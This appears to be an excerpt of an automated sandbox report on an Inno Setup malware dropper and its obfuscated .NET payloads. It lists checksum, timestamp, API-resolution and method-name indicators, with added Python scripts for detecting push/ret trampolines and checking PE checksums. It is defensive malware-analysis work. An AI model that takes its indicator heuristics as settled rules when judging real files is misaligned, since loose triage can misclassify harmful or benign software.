Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004860E4 push ecx; mov dword ptr [esp], ecx 1_2_004860E9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004062C4 push ecx; mov dword ptr [esp], eax 1_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004783C8 push ecx; mov dword ptr [esp], edx 1_2_004783C9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004104F0 push ecx; mov dword ptr [esp], edx 1_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0049AD44 pushad ; retf 1_2_0049AD53
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040CE48 push ecx; mov dword ptr [esp], edx 1_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00459378 push 004593BCh; ret 1_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040F3A8 push ecx; mov dword ptr [esp], edx 1_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004434B4 push ecx; mov dword ptr [esp], ecx 1_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0045186C push 0045189Fh; ret 1_2_00451897
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00451A30 push ecx; mov dword ptr [esp], eax 1_2_00451A35
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00495BE4 push ecx; mov dword ptr [esp], ecx 1_2_00495BE9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00419C38 push ecx; mov dword ptr [esp], ecx 1_2_00419C3D
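Every "push imm32 ... ret" hit above has its push target exactly 8 bytes past the ret (push 00406605h with ret at 004065FD, push 00409999h with ret at 00409991, push 00405749h with ret at 00405741, and so on). That is the byte layout of the Delphi compiler's try/finally epilogue (ret; jmp @HandleFinally; jmp @finally; @exit:), and the "push ecx; mov dword ptr [esp], reg" hits are Delphi's idiom for reserving a stack slot. Both 1nJGU59JPU.exe and its is-5FEVP.tmp child are Inno Setup stubs (the /SL5 switches and the inno-download-plugin idp.pdb path elsewhere in this report), and Inno Setup is written in Delphi, so in this sample the signature is matching compiler output rather than hand-written call/push/ret obfuscation. The scanner below is an added example, not part of the sandbox report: it finds push imm32 sequences whose immediate is an in-image address and separates a genuine push/ret trampoline (push immediately followed by ret) from the Delphi epilogue shape. The image base, the 64-byte search window and the 34-byte code fragment are all assumed or constructed for the example, and the matching is linear byte matching, not disassembly, so operand bytes can produce false hits.

```python
"""Heuristic scan for 'push imm32 ... ret' patterns in x86 code (added example)."""
import struct

IMAGE_BASE = 0x400000   # assumed; the report's hits all sit in the 0x40xxxx range
PUSH_IMM32, RET, JMP_REL32, JMP_REL8 = 0x68, 0xC3, 0xE9, 0xEB


def scan_push_ret(code: bytes, base: int = IMAGE_BASE, window: int = 64) -> list:
    """Return hits as dicts {push, ret, target, kind} holding virtual addresses.

    kind is one of:
      push-ret-jump       push imm32 directly followed by ret: a jump to imm32
                          that hides the control flow from a linear disassembler
      delphi-try-finally  push @exit ... ret; jmp rel32; jmp rel8 with
                          @exit == ret + 8: the Delphi try/finally epilogue
    """
    hits, n = [], len(code)
    for i in range(n - 5):
        if code[i] != PUSH_IMM32:
            continue
        target = struct.unpack_from("<I", code, i + 1)[0]
        if not base <= target < base + n:
            continue                       # immediate is not an in-image address
        if code[i + 5] == RET:
            hits.append({"push": base + i, "ret": base + i + 5,
                         "target": target, "kind": "push-ret-jump"})
            continue
        # look ahead for ret; jmp rel32; jmp rel8 where the push target is the
        # byte right after that sequence (8 bytes after the ret)
        for j in range(i + 5, min(i + 5 + window, n - 6)):
            if (code[j] == RET and code[j + 1] == JMP_REL32
                    and code[j + 6] == JMP_REL8 and target == base + j + 8):
                hits.append({"push": base + i, "ret": base + j,
                             "target": target, "kind": "delphi-try-finally"})
                break
    return hits


def format_hit(h: dict) -> str:
    """Render a hit in the report's own 'push ...h; ret ...' style."""
    return f"{h['push']:08X} push {h['target']:08X}h; ret {h['ret']:08X} ({h['kind']})"


# Constructed sample: a 34-byte fragment assumed to be mapped at IMAGE_BASE.
SAMPLE_CODE = bytes([
    0xB8, 0x01, 0x00, 0x00, 0x00,   # 400000: mov eax, 1
    0x68, 0x10, 0x00, 0x40, 0x00,   # 400005: push 0x400010
    0xC3,                           # 40000A: ret              -> lands at 400010
    0x90, 0x90, 0x90, 0x90, 0x90,   # 40000B: nop x5 (never executed)
    0x33, 0xC0,                     # 400010: xor eax, eax
    0x68, 0x21, 0x00, 0x40, 0x00,   # 400012: push 0x400021    (@exit)
    0x5A, 0x59,                     # 400017: pop edx; pop ecx (finally body)
    0xC3,                           # 400019: ret              -> @exit on the normal path
    0xE9, 0x00, 0x00, 0x00, 0x00,   # 40001A: jmp @HandleFinally (rel32 left as 0 here)
    0xEB, 0xF6,                     # 40001F: jmp 400017 (@finally)
    0xC3,                           # 400021: @exit: ret
])


if __name__ == "__main__":
    for hit in scan_push_ret(SAMPLE_CODE):
        print(format_hit(hit))
```

Run on a real section, pass the section's raw bytes and its mapped virtual address as `base`; hits of kind delphi-try-finally can be discounted, hits of kind push-ret-jump are the ones worth looking at.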
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00450334
Binary contains a suspicious time stamp
Source: 7((_8888YTR(.exe.1.dr Static PE information: 0xFC527B8E [Sun Feb 24 02:40:14 2104 UTC]
PE file contains an invalid checksum
Source: random.exe.10.dr Static PE information: real checksum: 0x2b239 should be: 0x290bc
Source: ZHunuhebaqu.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x12c6d
Source: 7((_8888YTR(.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x90de2
Source: Kixysyshysy.exe.3.dr Static PE information: real checksum: 0x0 should be: 0xa8222
Source: Vahutuqeke.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x92ff1
Source: irecord.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x5d3e9d
Source: 1nJGU59JPU.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x1151b3
Source: 1nJGU59JPU.exe Static PE information: real checksum: 0x0 should be: 0xc29aa
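In these lines "real checksum" is the value stored in IMAGE_OPTIONAL_HEADER.CheckSum and "should be" is the value recomputed over the file. A stored 0x0 means the linker never wrote one; the user-mode loader does not verify the field, so this is common and not suspicious by itself. A non-zero mismatch such as random.exe's 0x2b239 versus 0x290bc means the file changed after the checksum was written (patched, packed, or data appended) or the field was stomped. The "suspicious time stamp" hit above is the other header field worth checking the same way: 0xFC527B8E is a build date in 2104. The following is an added example, not part of the sandbox report: it recomputes the checksum with the same algorithm imagehlp's CheckSumMappedFile uses, reads the COFF TimeDateStamp, and flags a zeroed or future build time. The 512-byte header it builds as sample input is constructed for the example (PE32, no sections), and the `now_ts` parameter is an assumption so the check is reproducible.

```python
"""PE checksum and build-timestamp checks (added example, not report output)."""
import struct
from datetime import datetime, timedelta, timezone

_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def _pe_header_offset(data: bytes) -> int:
    """File offset of the 'PE\\0\\0' signature (IMAGE_DOS_HEADER.e_lfanew)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return pe_off


def checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (same for PE32 and PE32+)."""
    return _pe_header_offset(data) + 4 + 20 + 0x40   # signature + IMAGE_FILE_HEADER + 0x40


def stored_checksum(data: bytes) -> int:
    """The value the linker (or a later patcher) wrote into the header."""
    return struct.unpack_from("<I", data, checksum_offset(data))[0]


def pe_checksum(data: bytes) -> int:
    """Recompute the checksum as imagehlp!CheckSumMappedFile does: sum all 32-bit
    words with end-around carry (the CheckSum field itself counts as zero),
    fold the sum to 16 bits, then add the file length."""
    skip = checksum_offset(data) & ~3
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def patch_checksum(data: bytes) -> bytes:
    """Copy of data with a correct CheckSum, as a linker would emit it."""
    out = bytearray(data)
    struct.pack_into("<I", out, checksum_offset(data), pe_checksum(data))
    return bytes(out)


def coff_timestamp(data: bytes) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp (seconds since 1970) as a UTC datetime."""
    ts = struct.unpack_from("<I", data, _pe_header_offset(data) + 8)[0]
    return _EPOCH + timedelta(seconds=ts)


def timestamp_is_suspicious(data: bytes, now_ts: int = None) -> bool:
    """True for a zeroed (epoch) stamp or one later than 'now' (epoch seconds)."""
    if now_ts is None:
        now = datetime.now(timezone.utc)
    else:
        now = _EPOCH + timedelta(seconds=now_ts)
    built = coff_timestamp(data)
    return built == _EPOCH or built > now


def build_minimal_pe(timestamp: int = 0, checksum: int = 0) -> bytes:
    """Constructed 512-byte PE32 header with no sections, used as sample input."""
    hdr = bytearray(512)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                    # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHI", hdr, 0x44, 0x14C, 0, timestamp)   # Machine i386, 0 sections, TimeDateStamp
    struct.pack_into("<HH", hdr, 0x54, 0xE0, 0x0102)           # SizeOfOptionalHeader, Characteristics
    struct.pack_into("<H", hdr, 0x58, 0x10B)                   # Magic = PE32
    struct.pack_into("<I", hdr, 0x98, checksum)                # OptionalHeader.CheckSum
    return bytes(hdr)


def report_line(data: bytes) -> str:
    """Same wording the sandbox uses for a mismatch, plus the build time."""
    real, want = stored_checksum(data), pe_checksum(data)
    verdict = "checksum ok" if real == want else f"real checksum: {real:#x} should be: {want:#x}"
    return f"{verdict}; TimeDateStamp {coff_timestamp(data):%a %b %d %H:%M:%S %Y} UTC"


if __name__ == "__main__":
    sample = build_minimal_pe(timestamp=0xFC527B8E)   # the report's year-2104 stamp
    print(report_line(sample))                         # stored 0x0: never written
    print(report_line(patch_checksum(sample)))         # after a linker-style fix-up
```

To check a dropped file, read it with `open(path, "rb").read()` and pass the bytes to `report_line`; because the CheckSum field is skipped during summation, writing the recomputed value back does not change the result, which is the property the test below verifies.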
Source: 7((_8888YTR(.exe.1.dr, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 7((_8888YTR(.exe.1.dr, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 7((_8888YTR(.exe.1.dr, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 7((_8888YTR(.exe.1.dr, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 7((_8888YTR(.exe.1.dr, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 7((_8888YTR(.exe.1.dr, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 7((_8888YTR(.exe.1.dr, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 7((_8888YTR(.exe.1.dr, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: Vahutuqeke.exe.3.dr, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: Vahutuqeke.exe.3.dr, firefox__update__/Form1.cs High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: Vahutuqeke.exe.3.dr, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: Vahutuqeke.exe.3.dr, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: Vahutuqeke.exe.3.dr, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: Vahutuqeke.exe.3.dr, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: Vahutuqeke.exe.3.dr, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: Vahutuqeke.exe.3.dr, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: Vahutuqeke.exe.3.dr, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: Vahutuqeke.exe.3.dr, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
